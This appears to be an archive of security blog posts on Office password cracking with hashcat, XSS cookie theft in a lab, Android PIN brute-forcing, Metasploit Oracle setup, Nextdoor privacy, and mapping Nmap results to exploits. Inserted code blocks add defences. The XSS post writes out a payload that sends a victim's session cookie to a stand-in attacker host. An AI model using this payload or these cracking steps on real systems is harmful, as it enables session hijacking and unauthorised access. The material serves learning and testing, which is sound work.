Wednesday, February 11, 2015

Password cracking a Word document or an Excel file has become much easier. Previously you had to rely on a flaw in the document, some sketchy software or an even sketchier website. Since October 2014 OclHashcat supports cracking the document's password. The process is simple but not as straightforward as a novice might want. You need a couple of things: a graphics card capable of cracking using GPUs, such as an NVidia card with CUDA support, OclHashcat version 1.31 or greater, Python, and a password protected document.

I’m writing this for Windows because, let’s face it, if you lost a password for Word, Excel or Powerpoint you probably have Windows. First go to hashcat.net and grab the correct OclHashcat version for your GPU, either AMD or NVidia. Download it and unzip it; you may need 7zip if you can’t unzip the file. Next, you need Python; get that here: python.org. (I’m not going to say use Python 2.7 or Python 3, just grab whatever; I just use 2.7.) Grab the installer and install it. You also need a Python script called office2john, and you can get that here: office2john. Long story short, John the Ripper, another password cracking suite, is also capable of doing this, but I prefer OclHashcat.

Now we have everything we need to recover that password, right? Nope, we need one more thing: some dictionaries to use with OclHashcat. Get those from SkullSecurity. You can move on to rule attacks or brute force if the dictionaries fail. One of my first go-to lists is the rockyou list; start there.

Let’s get cracking: open up a command prompt and navigate to the directory with the office2john.py file and the password protected file. Enter: python office2john.py FILENAME, FILENAME being the protected document. After a second you will see output like below:

This is the hash of the password that protects the document. The important part here is highlighted, as we need to tell OclHashcat what type of hash this is. This one is an Office 2010 document. From the command prompt navigate to where you have OclHashcat (actually CudaHashcat for me). Entering --help after cudahashcat32.exe or cudahashcat64.exe will show you the hash type numbers; pick the one that matches the Office version you see in the extracted hash above.

Since the document is Office 2010 I need hash type 9500. Here is my command:

--username tells hashcat to ignore the username; in this case the username is “Book1.xlsx”.

The next part is the hash, followed by the dictionary. Running this will result in output similar to below.

In the image the hash was cracked in 4 seconds, with the password being “Password”. If that doesn’t work, try another dictionary, use rules or try to brute force. Keep in mind that a brute force can take a LONG TIME.

Even brute forcing a 6 character password with uppercase, lowercase and numbers can take more than a year. Obviously, the better or more GPUs you have, the faster it will be.
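The two decisions the post walks through by hand, reading the Office version out of the office2john output to pick the hash type and sizing a brute force before starting it, can be scripted. The block below is an added example and not the post's own code or part of office2john or hashcat. It assumes the `$office$*version*iterations*keysize*saltsize*salt*verifier*verifierhash` line format office2john prints, the hashcat mode numbers 9400, 9500 and 9600 for Office 2007, 2010 and 2013, and a constructed sample hash (the salt and verifier values are made up) with an assumed, not measured, hash rate.

```python
# Added example: classify an office2john line and size a brute-force run.
# Not the post's code; format and mode numbers are assumptions stated above.
import re

# hashcat hash-type number per Office version token in the $office$ hash
OFFICE_MODES = {"2007": 9400, "2010": 9500, "2013": 9600}

# "<filename>:$office$*<version>*<iterations>*<keysize>*<saltsize>*<salt>*<verifier>*<verifierhash>"
OFFICE_RE = re.compile(
    r"^(?P<username>[^:]+):(?P<hash>\$office\$\*(?P<version>\d{4})\*(?P<iterations>\d+)\*"
    r"(?P<keysize>\d+)\*(?P<saltsize>\d+)\*(?P<salt>[0-9a-fA-F]+)\*"
    r"(?P<verifier>[0-9a-fA-F]+)\*(?P<verifierhash>[0-9a-fA-F]+))$"
)

# Constructed sample in the shape of the post's Book1.xlsx output (hex values are made up).
SAMPLE_LINE = (
    "Book1.xlsx:$office$*2010*100000*128*16*"
    "0011223344556677889900aabbccddee*"
    "ffeeddccbbaa99887766554433221100*"
    + "0123456789abcdef" * 4
)


def parse_office2john(line):
    """Split one office2john line into the username (the filename) and the hash fields."""
    m = OFFICE_RE.match(line.strip())
    if not m:
        raise ValueError("not an office2john $office$ line")
    fields = m.groupdict()
    for key in ("iterations", "keysize", "saltsize"):
        fields[key] = int(fields[key])
    return fields


def hashcat_mode(parsed):
    """Map the version token (2007/2010/2013) to the hashcat -m number."""
    return OFFICE_MODES[parsed["version"]]


def hashcat_command(parsed, dictionary, binary="cudahashcat64.exe"):
    """Build the dictionary-attack command line; --username skips the 'Book1.xlsx:' prefix."""
    return '%s -m %d --username "%s:%s" %s' % (
        binary, hashcat_mode(parsed), parsed["username"], parsed["hash"], dictionary)


def keyspace(charset_size, length):
    """Number of candidates for an exhaustive search over one fixed length."""
    return charset_size ** length


def bruteforce_seconds(charset_size, length, hashes_per_second):
    """Worst-case seconds to exhaust the keyspace at an assumed hash rate."""
    return keyspace(charset_size, length) / float(hashes_per_second)


SAMPLE = parse_office2john(SAMPLE_LINE)

if __name__ == "__main__":
    print("version %s -> hashcat mode %d" % (SAMPLE["version"], hashcat_mode(SAMPLE)))
    print(hashcat_command(SAMPLE, "rockyou.txt"))
    # 62 characters (a-z, A-Z, 0-9) and length 6, at an assumed 1500 H/s
    days = bruteforce_seconds(62, 6, 1500) / 86400.0
    print("6-char mixed alnum at 1500 H/s: %.0f days" % days)
```

The rate is deliberately a parameter: Office 2010 hashes use 100000 iterations (the third field in the sample), so the per-document rate on a given card is what decides whether a brute force is hours or years, and it should be measured with the benchmark rather than guessed.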

Sunday, August 3, 2014

During Capture the Flag (CTF) events, or if you are learning to pentest, sometimes you may be posed with the challenge to log in to a website without having credentials. This type of attack generally requires a few things: a website (or part of one) that is protected, a victim, and cross site scripting. I have also included vulnerable web server code at the bottom of the post, so you can try it yourself.

The attacker finds a webserver vulnerable to XSS

The user logs into the webserver

The attacker sends a message with a malicious link designed to send the cookie to the attacker

The link is opened and the user unknowingly sends their cookie to the attacker

The attacker is happy as he logs into the webserver

In the example we use reflected XSS; this could be done with stored XSS as well, and the steps would remain the same with the exception of needing to send the message to the user.

2. A user logs into the site to perform normal business, and is given a session id.

Valid user login

3. The attacker sends a malicious link in an email or by some other means, with this type of link, which may vary or need to be encoded: http://192.168.1.190/login.html?user=test<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the link is opened it visits the page and shows an invalid user message to the victim. However, in the background it sends a request to the attacker’s site with their cookie included, where the attacker has just a simple Python web server listening. The incoming request shows the cookie: sessionid with the value "super_secret_session".

Incoming session information

5. The attacker then uses their preferred method to get the cookie into their browser, such as a plugin like the Web Developer toolbar for Firefox, and adds the cookie.

The attacker then simply visits the site and is
automatically logged in.

Below you will find the code for the vulnerable web server. The only requirement is Python.
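As an added example (not the post's own vulnerable server), the block below renders the "invalid user" page from step 4 two ways, so the reflected parameter can be seen going in raw and going in escaped, and builds the session cookie header with HttpOnly so that `document.cookie` in the injected script cannot read the session id at all. It assumes a GET to /login.html with user and pass parameters as in the post's link; the session value is the constructed one from the post's screenshot and the demo URL carries a harmless alert(1) payload.

```python
# Added example, not the post's code: vulnerable vs. escaped reflection of a
# query parameter, plus a Set-Cookie header that keeps the session id out of
# document.cookie. Runs on Python 3's standard library only.
from html import escape
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit, parse_qs

SESSION_ID = "super_secret_session"  # constructed value matching the post's screenshot
# Constructed request path with a harmless payload standing in for the post's image-beacon one.
DEMO_URL = "/login.html?user=test<script>alert(1)</script>&pass=test"


def user_from_url(url):
    """Pull the 'user' query parameter out of a request path or full URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("user", [""])[0]


def login_error_vulnerable(user):
    # Reflects the raw parameter: markup in ?user= becomes part of the page and runs.
    return "<html><body>Invalid user: %s</body></html>" % user


def login_error_safe(user):
    # Escapes < > & " ' so the parameter is shown as text and never parsed as HTML.
    return "<html><body>Invalid user: %s</body></html>" % escape(user, quote=True)


def session_cookie_header(session_id, secure=False):
    """Value for Set-Cookie: HttpOnly hides it from script, SameSite=Lax keeps it off
    cross-site requests such as the beacon in the post, Secure limits it to HTTPS."""
    attrs = ["sessionid=%s" % session_id, "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)


def make_handler(render):
    """Build a request handler that answers every GET with render(user) as the page body."""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = render(user_from_url(self.path)).encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Set-Cookie", session_cookie_header(SESSION_ID))
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    return Handler


if __name__ == "__main__":
    # Serve the escaped version on localhost; swap in login_error_vulnerable to
    # reproduce the post's behaviour in a lab and compare the two responses.
    HTTPServer(("127.0.0.1", 8080), make_handler(login_error_safe)).serve_forever()
```

Escaping the output is the actual fix for the XSS; the cookie attributes are defence in depth that limit what a script injected elsewhere can take, which is why both belong in the same change.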

Wednesday, January 15, 2014

Sticking with the theme this week, I have been bored and haven’t been able to sleep well. I decided to try my hand at brute forcing the PIN on my Samsung Galaxy S3. Annoyingly enough, the Android operating system thought people would do this, and after 5 failed attempts you have to wait 30 seconds. Luckily, that doesn't change, so automating will be easy. I have seen Hak5’s rubber ducky do this attack, as it simply emulates a keyboard. So I decided to try it with my Arduino, and it works just fine. If you went from 0000 to 9999 that would take roughly 16 hours; the odds are you would get it before then.

I also tried to play with other authentication types on my phone. The most interesting was the pattern type, which now forces you to create a backup PIN. If this is set and you can’t get the pattern, you can brute force the backup PIN all day and it doesn't have the 30 second delay. After 5 failed swipe attempts you get the option to enter your backup PIN. See the image below. That makes for much faster brute forcing.

The Arduino sketch below first tries the top 20 PINs and then starts its brute force cycle. Yes, it will eventually repeat those 20, but we will try those first, just in case.

For this attack to work you will need an Arduino Leonardo, or an Arduino that can act as a HID (Human Interface Device), a USB OTG (on-the-go) cable and a target device. I always set my HID sketches to work with a switch, as I do not want to race the clock trying to upload a new sketch.

In all seriousness, this would be a last resort type of thing for me; it’s going to take a long time. I would try to narrow it down somehow, like eliminating the 0 range such as 0000-0999. Do most people start with a zero? Maybe not.

Finally, the backup PIN brute force in my opinion is a real issue;
you could brute force that fairly quickly.
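The two timings the post gives, roughly 16 hours with the 30-second wait after every 5 failures and "all day" with no delay for the backup PIN, come from the lockout policy rather than the PIN length, so it is worth modelling the policy itself. The block below is an added example, not the post's Arduino sketch; the fixed policy is the one the post observed, while the escalating policy (doubling wait capped at an hour) and the per-attempt typing time are assumptions for comparison, not a description of any particular Android version.

```python
# Added example, not the post's sketch: worst-case time to exhaust a 4-digit
# PIN space under different lockout policies. Fixed policy is the post's
# observation; the escalating policy and attempt timing are assumed.


def fixed_lockout(window=5, delay=30.0):
    """After every `window` failures wait `delay` seconds, and never more (the post's case)."""
    def penalty(failures):
        return delay if failures % window == 0 else 0.0
    return penalty


def escalating_lockout(window=5, base=30.0, cap=3600.0):
    """Assumed policy: the wait doubles on each lockout, capped at `cap` seconds."""
    def penalty(failures):
        if failures % window != 0:
            return 0.0
        rounds = failures // window             # 1 on the first lockout, 2 on the next, ...
        exponent = min(rounds - 1, 60)          # avoid float overflow for huge round counts
        return min(base * 2 ** exponent, cap)
    return penalty


def no_lockout(failures):
    """The backup-PIN case the post describes: no delay between attempts."""
    return 0.0


def seconds_to_exhaust(keyspace, penalty, attempt_seconds=0.0):
    """Worst case: every PIN is tried and only the last one succeeds, so there are
    keyspace-1 failures, each possibly followed by a lockout, plus the final attempt."""
    total = 0.0
    for failures in range(1, keyspace):
        total += attempt_seconds + penalty(failures)
    return total + attempt_seconds


def hours(seconds):
    return seconds / 3600.0


if __name__ == "__main__":
    space = 10 ** 4                              # 0000-9999
    print("fixed 30 s / 5 tries : %.1f h" % hours(seconds_to_exhaust(space, fixed_lockout())))
    print("doubling, 1 h cap    : %.1f h" % hours(seconds_to_exhaust(space, escalating_lockout())))
    # backup PIN with no delay; 2 s per attempt is an assumed typing speed for a keyboard emulator
    print("no lockout, 2 s/try  : %.1f h" % hours(seconds_to_exhaust(space, no_lockout, 2.0)))
```

The fixed policy yields about 16.7 hours, matching the post's figure; an escalating policy with the same 30-second start pushes the same search past 80 days, which is the property a lockout needs if the backup credential is to be worth anything.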

Tuesday, January 14, 2014

In my quest to continue to learn more about Python I decided to try my hand at making a GUI application. I then thought, why not a simple SMTP tool? Why, you ask? Honestly, some nights are long and boring. I also wanted to write something cross platform, so I chose wxPython. This was nothing more than a see-if-I-can-do-it type of exercise. It was an experience, and lining things up wasn't fun. The other thing I wanted to do was compile it to an executable, for which I used PyInstaller. Shockingly, because of all the added items that come with a GUI, the final binary turned out to be 7.5MB; that's huge.

This was still a fun little tool to build, and I learned a lot doing it.

The tool is straightforward: simply put in the relevant information and hit OK to send. You will need an email server with open relay to put in the server and port information. I use Sendmail or Postfix; either works just fine. Don’t ask me how to do it, Google it.

Here is an image, and the code is below. I am not liable for how you use this tool, and you are only allowed to use it against targets for which you have permission.

Saturday, August 24, 2013

Getting Oracle support in Metasploit can be a complete pain; there are a lot of little things that some blogs have right, some are missing a step or two and some are just outdated. I couldn't find any information that gave me the complete answers; when I finally figured it out and tested it, the setup was quite painless. When it doesn't work, the image below is the error you see, and even the link shown in the error is outdated. *

It's important to point out that the module I'm using in these examples is auxiliary/admin/oracle/oracle_login, not the ones in the scanner directory.

From here you need a few things. Head over to the following sites and grab these files; on Oracle you need to make an account (don’t worry, 10 minute mail works for that). Make sure you get the 32 or 64 bit version for your system:

Also, I have always gotten an error on the LD_LIBRARY path when I ran the ruby setup, so just do this again but define it like below:

export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2

cd ruby-oci8-2.1.5/

ruby setup.rb config *** see update if this errors out.

ruby setup.rb setup

ruby setup.rb install

Make sure you restart Metasploit and give it a try; if all works like it should, you should now be able to test Oracle with Metasploit. You can test with 127.0.0.1 just to verify everything is working; you don’t need to have Oracle running to verify it will work.

That's it good luck, and enjoy!

As pointed out in the comment below, you may also wish to check with the auxiliary/admin/oracle/oracle_sql module to verify full functionality. Thanks CG!

*****UPDATE*****
Some distros such as Kali 1.08 may need the Ruby dev modules installed before running the ruby setup.rb command. Simply do an apt-get install ruby-dev before you run it. Thanks to Jagar for pointing out this issue.

Tuesday, April 30, 2013

I ran across this site Nextdoor.com, it is another social media site with one difference. “Nextdoor is the private social network for you, your neighbors and your community. It's the easiest way for you and your neighbors to talk online and make all of your lives better in the real world.” The idea is that only people in your real neighborhood can join. Out of curiosity I started looking around the demo site and started to think, this sounds like a terrible idea.

However, in my opinion this starts to go wrong very fast. A quick Google of site:nextdoor.com already starts to produce some interesting results. The first and second pages report results such as West Briar, Pointe Marin, Covie Hill and Bent Creek. Clicking these links will take you to a login page where you can get a little more information about the neighborhood, such as the city, state and an outlined map of the neighborhood.

Figure 1

Okay, so what’s the risk? First the “bad guys” already know
the city, state and the neighborhood. Another quick Google search results in
finding an invite page where you enter your address and thanks to the mini map
and some more Google it is easy to find an address within the outline.

Figure 2

The next step is an address verification page. The site
requires either a credit card for checking the billing address, a mobile number
they can call or they can send you a postcard in the mail. I won’t get into the
other worries that some of those options might cause, but it looks like they
are trying hard to protect the people using the site, but is that enough? And can it be easily circumvented?

What if someone simply gets into a valid account? (We don’t care how at this moment; it happens every day to many sites.) Could an attacker use any of the data or information to their advantage? The demo site shows us that there is a lot of information ripe for the picking.

The site is a standard social media site. You have maps, an inbox, events and a neighbors button; the exception here is that the site really wants your physical data as well, and it becomes a data gatherer’s dream. Clicking on a user shows some useful information; obviously it is up to the user what to display. With the data in figure 3 an attacker could start looking to impersonate that person, or use the data to gain access to other accounts via password resets or challenge questions like “what is your dog’s name?” or “what is your oldest child’s name?”

Figure 3

As we go deeper into the site we start to see more information
that could be valuable or even deadly. The personal risk you accept is huge;
one of the best things about the internet is if you’re careful someone finding
you in the real world is a little bit challenging.

Figure 4

This example on the demo site shows a user asking for a babysitter from 4-10 pm, and other users posting phone numbers of great babysitters. This of course is incredibly helpful for the person needing the sitter. But what does it tell the bad guys? Mom or Dad won’t be home from 4-10, the name and number of the babysitter, and the kids are older, most likely between the ages of 7-12. That information could be valuable to any person who wants to use it to their advantage. Did this home just become a possible target for a personal attack, a robbery, an angry boyfriend of the babysitter, or that creepy person down the street that nobody talks to?

It is your job to decide if this information is secure and okay to display to the public. No matter what the claims of privacy are, assume someone you don’t want seeing this information will see it. Above all else protect your family and yourself, and maybe, just maybe, actually go outside and talk to your neighbors. Finally, another important item to consider when signing up for this type of site is: do they care about security? Looking at the current job postings, they are hiring a lot of developers and none of the requirements in any of those postings mention “secure coding practices”. Hopefully that is asked during the interview process.

Thursday, February 28, 2013

Ever run into a test where you port scan and you just cannot remember what those ports are, or whether there are any vulnerabilities connected to them? Normally, I would just take the port and do a search on Exploit-db.com. However, I found myself doing that a lot on this last test; there were lots of weird ports. I started by writing a page scraper for Exploit-DB that took just a list of ports; it was a little slow. I added functionality to search the Exploit-DB CSV file that is in Backtrack, or if you have the file you can just point the script at it. I quickly became annoyed with having to take the ports from my Nmap results, put them into a text file and then run my script. I then found out there is an API for Exploit-DB, so it was back to the drawing board, and at the end of the day the Gather Sploits script was born.

The script simply parses an Nmap XML file, grabs the host, ports and OS and runs them through either the Exploit-DB online search or the local file if specified. There are some requirements though: you will need a Shodan API key (instructions at http://docs.shodanhq.com/). You will also need the Shodan Python libraries, which you can get at https://github.com/achillean/shodan-python. Finally, you will need the code at the end of this article and Python 2.7.

If the Nmap XML has operating system (OS) detection in it, the script will limit the port findings based on that OS, along with the exploits that are for multiple OSs. You can specify an OS or force all results. This script produces a lot of data; you have been warned.
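The local half of what the post describes, reading hosts, open ports and the OS match out of Nmap XML and filtering a CSV index by port and platform, fits in a short script. The block below is an added example, not the Gather Sploits script, and uses only the Python 3 standard library (no Shodan key needed). The Nmap XML and the CSV are constructed samples; the CSV uses an `id,file,description,date,author,platform,type,port` header, which is an assumption about the Exploit-DB files.csv layout, and the rows are fictional entries, not real exploit ids.

```python
# Added example, not the post's script: parse Nmap XML for address, open ports
# and OS match, then filter a constructed CSV index by open port and OS family.
# The "force all" and "specify an OS" switches mirror the options the post lists.
import csv
import io
import xml.etree.ElementTree as ET

# Constructed Nmap XML: one host, two open ports, one closed port, one OS match.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.1.190" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
  </host>
</nmaprun>
"""

# Constructed CSV in the assumed files.csv column layout; every row is fictional.
EXPLOIT_CSV = """id,file,description,date,author,platform,type,port
1001,platforms/linux/remote/1001.c,Constructed FTP daemon entry,2012-01-01,example,linux,remote,21
1002,platforms/windows/remote/1002.py,Constructed SMB entry,2012-02-02,example,windows,remote,445
1003,platforms/multiple/remote/1003.txt,Constructed web server entry,2012-03-03,example,multiple,remote,80
1004,platforms/windows/remote/1004.rb,Constructed IIS entry,2012-04-04,example,windows,remote,80
"""

OS_FAMILIES = ("windows", "linux", "freebsd", "solaris", "osx")


def parse_nmap(xml_text):
    """Return [{'addr', 'ports' (open TCP/UDP port numbers), 'os' (best osmatch name or None)}]."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address").get("addr")
        ports = [int(p.get("portid")) for p in host.findall("ports/port")
                 if p.find("state").get("state") == "open"]
        osmatch = host.find("os/osmatch")
        hosts.append({"addr": addr, "ports": ports,
                      "os": osmatch.get("name") if osmatch is not None else None})
    return hosts


def os_family(os_name):
    """Reduce an Nmap osmatch name to the platform token used in the CSV, or None."""
    if not os_name:
        return None
    lowered = os_name.lower()
    for family in OS_FAMILIES:
        if family in lowered:
            return family
    return None


def load_exploits(csv_text):
    """Read the CSV index, keeping only rows that carry a port number."""
    return [row for row in csv.DictReader(io.StringIO(csv_text)) if row.get("port", "").strip()]


def match_exploits(host, exploits, force_all=False, os_override=None):
    """Rows whose port is open on the host; unless force_all, the platform must be
    the host's OS family (detected or given) or 'multiple'. Unknown OS keeps everything."""
    family = os_override or os_family(host["os"])
    open_ports = set(host["ports"])
    hits = []
    for row in exploits:
        if int(row["port"]) not in open_ports:
            continue
        if force_all or family is None or row["platform"] in (family, "multiple"):
            hits.append(row)
    return hits


if __name__ == "__main__":
    index = load_exploits(EXPLOIT_CSV)
    for host in parse_nmap(NMAP_XML):
        print(host["addr"], host["ports"], host["os"])
        for row in match_exploits(host, index):
            print("  port %s  %s  [%s]" % (row["port"], row["description"], row["platform"]))
```

Filtering on the OS match is what keeps the output manageable, as the post notes; the force-all switch is there for the case where the OS guess is wrong, which Nmap's accuracy attribute will often hint at.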